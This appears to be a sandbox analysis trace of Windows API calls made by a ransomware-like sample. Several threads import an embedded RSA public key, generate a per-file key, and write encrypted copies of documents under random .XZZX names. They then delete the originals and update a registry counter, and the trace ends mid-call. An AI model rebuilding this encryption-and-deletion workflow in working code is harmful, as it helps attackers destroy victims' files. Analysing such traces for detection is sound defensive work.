OutputDebugStringW (lpOutputString="end") [0042.048] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0042.048] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0042.048] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x42d4328) returned 1 [0042.048] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4328, dwCertEncodingType=0x1, pInfo=0x3dd2c28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2c58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2c60*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e56d0) returned 1 [0042.048] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.049] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0042.049] CryptEncrypt (in: hKey=0x42e56d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0042.049] CryptEncrypt (in: hKey=0x42e56d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d43b0*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d43b0*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0042.049] WriteFile (in: hFile=0x4c8, lpBuffer=0x42d43b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d43b0*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0042.049] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0042.049] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.049] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0042.049] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0042.049] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4bc) returned 0x0 [0042.049] RegQueryValueExW (in: hKey=0x4bc, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x2d, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0042.049] RegCloseKey (hKey=0x4bc) returned 0x0 [0042.049] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4bc) returned 0x0 [0042.050] RegSetValueExW (in: hKey=0x4bc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x2e, cbData=0x4 | out: lpData=0x42cdfec*=0x2e) returned 0x0 [0042.050] RegCloseKey (hKey=0x4bc) returned 0x0 [0042.050] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.050] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.050] CloseHandle (hObject=0x4c8) returned 1 [0042.051] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0042.051] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0042.052] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\YtaJJRAGe.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\ytajjrage.rtf")) returned 1 [0042.053] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\YtaJJRAGe.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\ytajjrage.rtf")) returned 0 Thread: id = 140 os_tid = 0x984 [0042.053] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.053] lstrcpyW (in: lpString1=0x417f460, lpString2="ZjfGK_.odt" | out: lpString1="ZjfGK_.odt") returned="ZjfGK_.odt" [0042.053] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0042.053] SetErrorMode (uMode=0x1) returned 0x1 [0042.053] lstrcpyW (in: lpString1=0x417f860, lpString2="ZjfGK_.odt" | out: lpString1="ZjfGK_.odt") returned="ZjfGK_.odt" [0042.053] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x49b807ff, Data2=0xb43, Data3=0x4331, Data4=([0]=0x96, [1]=0xc7, [2]=0x6e, [3]=0x7e, [4]=0x34, [5]=0x8d, [6]=0xb6, [7]=0x62))) returned 0x0 [0042.053] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\ZjfGK_.odt") returned 91 [0042.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0042.053] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\33820CBD02F4B0D349B807FF070C951B.XZZX") returned 118 [0042.054] StrStrW (lpFirst="ZjfGK_.odt", lpSrch="XZZX") returned 0x0 [0042.054] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\ZjfGK_.odt", dwFileAttributes=0x20) returned 1 [0042.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\ZjfGK_.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\zjfgk_.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0042.054] ReadFile (in: hFile=0x4b0, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x10f98, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x10f98, lpOverlapped=0x0) returned 1 [0042.054] CloseHandle (hObject=0x4b0) returned 1 [0042.054] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0042.055] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0042.055] SetErrorMode (uMode=0x1) returned 0x1 [0042.055] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0042.055] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4438) returned 1 [0042.057] CryptGenKey (in: hProv=0x42d4438, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5750) returned 1 [0042.292] CryptExportKey (in: hKey=0x42e5750, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0042.292] CryptExportKey (in: hKey=0x42e5750, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0042.292] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.293] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0042.293] CryptDestroyKey (hKey=0x42e5750) returned 1 [0042.293] CryptReleaseContext (hProv=0x42d44c0, dwFlags=0x0) returned 0 [0042.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\33820CBD02F4B0D349B807FF070C951B.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\33820cbd02f4b0d349b807ff070c951b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4 [0042.293] WriteFile (in: hFile=0x4d4, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x10f98, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x10f98, lpOverlapped=0x0) returned 1 [0042.295] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10f98 [0042.295] WriteFile (in: hFile=0x4d4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.295] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10f9d [0042.295] WriteFile (in: hFile=0x4d4, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x14, lpOverlapped=0x0) returned 1 [0042.295] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10fb1 [0042.295] WriteFile (in: hFile=0x4d4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.295] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10fb6 [0042.295] SetErrorMode (uMode=0x1) returned 0x1 [0042.295] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0042.295] OutputDebugStringW (lpOutputString="end") [0042.296] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0042.296] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0042.296] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d4548) returned 1 [0042.296] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4548, dwCertEncodingType=0x1, pInfo=0x3e3f490*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f4c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f4c8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5750) returned 1 [0042.296] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.297] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0042.297] CryptEncrypt (in: hKey=0x42e5750, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0042.297] CryptEncrypt (in: hKey=0x42e5750, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d45d0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d45d0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0042.297] WriteFile (in: hFile=0x4d4, lpBuffer=0x42d45d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d45d0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0042.298] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0042.298] WriteFile (in: hFile=0x4d4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.298] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0042.298] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0042.298] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4e0) returned 0x0 [0042.298] RegQueryValueExW (in: hKey=0x4e0, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x2e, lpcbData=0x417dfdc*=0x4) returned 0x0 [0042.298] RegCloseKey (hKey=0x4e0) returned 0x0 [0042.298] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4e0) returned 0x0 [0042.298] RegSetValueExW (in: hKey=0x4e0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x2f, cbData=0x4 | out: lpData=0x417dfec*=0x2f) returned 0x0 [0042.298] RegCloseKey (hKey=0x4e0) returned 0x0 [0042.298] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.299] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.299] CloseHandle (hObject=0x4d4) returned 1 [0042.300] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0042.301] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0042.301] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\ZjfGK_.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\zjfgk_.odt")) returned 1 [0042.302] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\ZjfGK_.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\zjfgk_.odt")) returned 0 Thread: id = 141 os_tid = 0x9a0 [0042.241] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.241] lstrcpyW (in: lpString1=0x42cf460, lpString2="hcLzjn0RCFG.odp" | out: lpString1="hcLzjn0RCFG.odp") returned="hcLzjn0RCFG.odp" [0042.241] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.241] SetErrorMode (uMode=0x1) returned 0x1 [0042.241] lstrcpyW (in: lpString1=0x42cf860, lpString2="hcLzjn0RCFG.odp" | out: lpString1="hcLzjn0RCFG.odp") returned="hcLzjn0RCFG.odp" [0042.241] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x9389deb, Data2=0xdd99, Data3=0x403c, Data4=([0]=0x8d, [1]=0xd1, [2]=0x6c, [3]=0xca, [4]=0xe8, [5]=0x5b, [6]=0xb1, [7]=0xb))) returned 0x0 [0042.241] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\hcLzjn0RCFG.odp") returned 96 [0042.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0042.241] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\632A4073379A2FDC09389DEB3BC71424.XZZX") returned 118 [0042.241] StrStrW (lpFirst="hcLzjn0RCFG.odp", lpSrch="XZZX") returned 0x0 [0042.241] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\hcLzjn0RCFG.odp", dwFileAttributes=0x20) returned 1 [0042.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\hcLzjn0RCFG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\hclzjn0rcfg.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4 [0042.242] ReadFile (in: hFile=0x4d4, lpBuffer=0x42d8518, nNumberOfBytesToRead=0x85d4, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42d8518*, lpNumberOfBytesRead=0x42ce418*=0x85d4, lpOverlapped=0x0) returned 1 [0042.242] CloseHandle (hObject=0x4d4) returned 1 [0042.243] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0042.243] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0042.243] SetErrorMode (uMode=0x1) returned 0x1 [0042.244] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0042.244] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d44c0) returned 1 [0042.246] CryptGenKey (in: hProv=0x42d44c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e57d0) returned 1 [0042.524] CryptExportKey (in: hKey=0x42e57d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0042.524] CryptExportKey (in: hKey=0x42e57d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x42ce41c | out: pbData=0x3f00000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0042.524] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.525] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0042.525] CryptDestroyKey (hKey=0x42e57d0) returned 1 [0042.525] CryptReleaseContext (hProv=0x42d4658, dwFlags=0x0) returned 0 [0042.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\632A4073379A2FDC09389DEB3BC71424.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\632a4073379a2fdc09389deb3bc71424.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c8 [0042.525] WriteFile (in: hFile=0x4c8, lpBuffer=0x42d8518*, nNumberOfBytesToWrite=0x85d4, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d8518*, lpNumberOfBytesWritten=0x42ce438*=0x85d4, lpOverlapped=0x0) returned 1 [0042.526] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85d4 [0042.526] WriteFile (in: hFile=0x4c8, 